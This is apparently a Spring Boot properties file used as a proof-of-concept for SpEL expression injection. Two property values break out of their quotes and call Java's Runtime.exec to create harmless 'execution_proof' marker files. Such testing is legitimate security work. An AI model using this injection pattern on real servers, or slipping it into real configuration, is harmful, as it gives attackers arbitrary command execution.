server.port=1080
#server.servlet.contextPath=/example
server.error.include-message=always

logging.config=logback-spring.xml
logging.file.path=log

#myProperty=Y/;c&G*n;*"[2>To5fO63q"gH?|C)OR|*{={ 50(7'+l?`G{=HNK i&B5UXh.A3wo;RP,WlRUN-](#=<_}tv)QEAb}3eU[YOJq1i

myProperty1='.isEmpty() == true && T(java.lang.Runtime).getRuntime().exec("touch execution_proof_1.txt") != null && 'the actual property text
myProperty2=".isEmpty() == true && T(java.lang.Runtime).getRuntime().exec("touch execution_proof_2.txt") != null && "the actual property text

#   Y/;c&G*n;*"[2>To5fO63q"gH?|C)OR|*{={ 50(7'+l?`G{=HNK i&B5UXh.A3wo;RP,WlRUN-](#=<_}tv)QEAb}3eU[YOJq1i'.trim().isEmpty() == false}
